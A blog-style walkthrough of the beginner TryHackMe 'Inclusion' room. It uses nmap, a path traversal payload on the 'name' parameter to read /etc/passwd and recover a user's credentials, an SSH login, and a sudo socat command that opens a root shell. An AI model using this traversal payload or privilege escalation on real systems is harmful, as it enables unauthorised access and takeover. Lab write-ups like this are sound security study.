LFI Inclusion-TryHackMe

LFI -TryHackMe

This is a write-up for LFI Inclusion room from TryHackMe which is a beginner level LFI challenge:

https://tryhackme.com/room/inclusion

Our task is simple: Deploy the machine and find LFI parameters and get the user and root flag. First check what all services are running on the machine using:

nmap -sC -sV 10.10.41.78
nmap scan

So we have SSH and a Web Server running. Lets check the website first.

On the website after doing basic browsing we found the following links:

  • http://10.10.41.78/article?name=hacking
  • http://10.10.41.78/article?name=lfiattack
  • http://10.10.41.78/article?name=rfiattack

We have a parameter “name” and this can be used to do LFI.

Lets try the following and see if we get anything:

http://10.10.41.78/article?name=../../../../../etc/passwd

/etc/passwd file

and sure enough we get credentials for a user named falconfeast. Lets login to the box with SSH using these credentials:

ssh falconfeast@10.10.41.78

We got our user flag in the home directory of user falconfeast.

Now lets see if we can run something as sudo using: sudo -l

sudo -l

Yes we can run socat as root and without password. Great lets do some Privilege Escalation. Go to https://gtfobins.github.io/ and search for “socat”. We found:

Lets try this to see if we can get a root shell using what we found:

sudo socat stdin exec:/bin/sh

socat privesc

We got our root flag also. Submit both the flags :)

Originally published at https://basicpentesting.blogspot.com on July 29, 2020.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Rusty Walkthrough — PWNX

LFI Inclusion — Try Hack Me

DC -2 PG-PLAY

TryHackMe: [Day 19] Blue Teaming Something Phishy Is Going On